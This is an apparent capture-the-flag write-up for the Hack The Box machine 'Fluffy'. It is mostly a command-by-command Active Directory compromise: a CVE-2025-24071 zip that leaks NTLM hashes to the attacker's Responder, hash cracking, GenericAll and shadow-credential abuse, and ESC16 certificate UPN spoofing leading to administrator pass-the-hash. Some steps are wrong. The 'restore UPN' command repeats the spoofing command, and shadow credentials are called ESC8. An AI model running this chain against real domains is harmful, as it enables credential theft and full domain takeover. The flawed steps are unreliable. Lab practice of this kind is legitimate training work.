Fluffy

Machine Link: https://app.hackthebox.com/machines/Fluffy

---

Enumeration (j.fleischman)

Port scanning

• Checking open ports and the running services

nmap -p- -sS -n -Pn --min-rate 5000 10.10.11.69 -oG allPorts
nmap -p53,88,139,389,445,464,593,636,3268,3269,5985,9389 -sCV -n -Pn --min-rate 5000 10.10.11.69 -oN Targeted

View

Domain: fluffy.htb DC: DC01.fluffy.htb

SMB

• Using the given user we can enumerate SMB shares, and we found this folder

impacket-smbclient fluffy.htb/'j.fleischman':'J0elTHEM4n1990!'@10.10.11.69
 
use IT
 
get *

View

Exploitation (j.fleischman ⇨ p.agila)

CVE-2025-24071

• There are some interesting files and if we unzip it we see a interesting extension

View

• Maybe if we upload a malicius .zip file we can get the NetNTLMv2 hash, we can use this PoC in order to make the file

git clone https://github.com/Marcejr117/CVE-2025-24071_PoC
cd CVE-2025-24071_PoC
python3 PoC.py Mytest 10.10.16.2

View

• now we start Responder and send the payload .zip using smbclient

sudo python3 ./Responder.py -I tun0
 
put exploit.zip

View

Cracking

• We have a hash so lets crack it using hashcat

hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt

View

Creds: p.agila:prometheusx-303

Enumeration (p.agila)

BloodHound

• Lets see the gerarqui of the AD enviroment so firts run ntpdate, bloodhaund-python and then import .zip to BloodHound,

sudo ntpdate -u 10.10.11.69
 
bloodhound-python -u 'p.agila' -p 'prometheusx-303' -c ALL -v --zip -d FLUFFY.HTB -dc DC01.FLUFFY.HTB -ns 10.10.11.69

View

Exploitation (GenericAll)

• p.agila is member of SERVICE ACCOUNT MANAGERS that have “GenericAll” priv over SERVICE ACCOUNTS so we can add it to this gruop

net rpc group addmem "Service Accounts" "p.agila" -U "FLUFFY.HTB"/"p.agila"%"prometheusx-303" -S "DC01.FLUFFY.HTB"

• we can check it, running this command

net rpc group members "Service Accounts" -U "FLUFFY.HBT"/"p.agila"%"prometheusx-303" -S "DC01.FLUFFY.HTB"
 
or 
 
net rpc user info "p.agila" -U "FLUFFY.HBT/p.agila%prometheusx-303" -S DC01.FLUFFY.HTB
 

View

Exploitation (GenericWrite to WINRM_SVC)

• Using pywhisker.py

python3 pywhisker/pywhisker.py -d FLUFFY.HTB -u p.agila -p 'prometheusx-303' --target "WINRM_SVC" --action "add" --dc-ip 10.10.11.69 --filename CACert --export PEM

• Getting the TGT

python3 PKINITtools/gettgtpkinit.py -dc-ip 10.10.11.69 -cert-pem CACert_cert.pem -key-pem CACert_priv.pem FLUFFY.HTB/WINRM_SVC winrm_SRV_Bueno.ccache

View

• nos conectamos

KRB5CCNAME=winrm_SRV_Bueno.ccache evil-winrm -i DC01.FLUFFY.HTB -u WINRM_SVC -r FLUFFY.HTB -c CACert_cert.pem -k CACert_priv.pem

• also we can get the NTLM hash

python3 PKINITtools/getnthash.py FLUFFY.HTB/WINRM_SVC -key 62c40e2dd846dc69875827e337682d4c6f664292c602212d966d071360a896bf

View

Hash NTLM= 33bd09dcd697600edf6b3a7af4875767

Getting Access (WINRM_SVC)

• using evil-winrm

export KRB5CCNAME=winrm_SRV_Bueno.ccache evil-winrm -i DC01.FLUFFY.HTB -u WINRM_SVC -r FLUFFY.HTB -c CACert_cert.pem -k CACert_priv.pem

View

Exploitation (GenericWrite to CA_SVC)

• As i cant perform DCSync attack i have to find and other way, like get control of ca_svc, like in the las step, but this time lets do it using certipy-ad / certipy (just to practice, instead of pywhisker.py and gettgtpkinit.py), first we explote GenericAll to add p.agila to Service Accounts

net rpc group addmem "Service Accounts" "p.agila" -U "FLUFFY.HTB"/"p.agila"%"prometheusx-303" -S "DC01.FLUFFY.HTB"

• now we have permission to perform shadow credential attack (Use GenericWrite permision in order to modifies the KeyCredentials of the account), also known as ESC8

certipy shadow auto -username P.AGILA@fluffy.htb -password 'prometheusx-303' -account ca_svc

View

NT Hash: ca0f4f9e9eb8a092addf53bb03fc98c8

Privilege escalation

you can preform this method using certify version < 5.x.x but if you want to know who i found this way, you will need to update the version >5 and then use this command

• Reading attributes

certipy account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.129.XX.XX -user 'ca_svc' read

Looking for vulnerabilities

certipy find -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -stdout -vulnerable

• ESC16 (Abusing UPN Spoofing and ESC1) , because we can change the “UserPrincipalName” of ca_svc@fluffy.htb to administrator this is posible because the ADCS is bad configured and allow ESC1 attack so we can request for a certify with a UPN of the administrator

certipy account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -upn 'administrator' -user 'ca_svc' update

View

• Now we just need to request the certify with UPN spoofed (I had to execute it a couple of times)

Getting PKI and CN of ADCS

netexec ldap fluffy.htb -u p.agila -p prometheusx-303 -M adcs

certipy req -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'

View

• Perfect now we have to restore the old value of UPN, and then perform an authentication like administrator

certipy account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -upn 'administrator' -user 'ca_svc' update
 
certipy auth -pfx administrator.pfx -username 'administrator' -domain 'fluffy.htb' -dc-ip 10.10.11.69

View

Getting access (Administrator)

• Using evil-winrm and the NT hash we can access as administrator

evil-winrm -i DC01.FLUFFY.HTB -u administrator -H "8da83a3fa618b6e3a00e93f676c92a6e"

View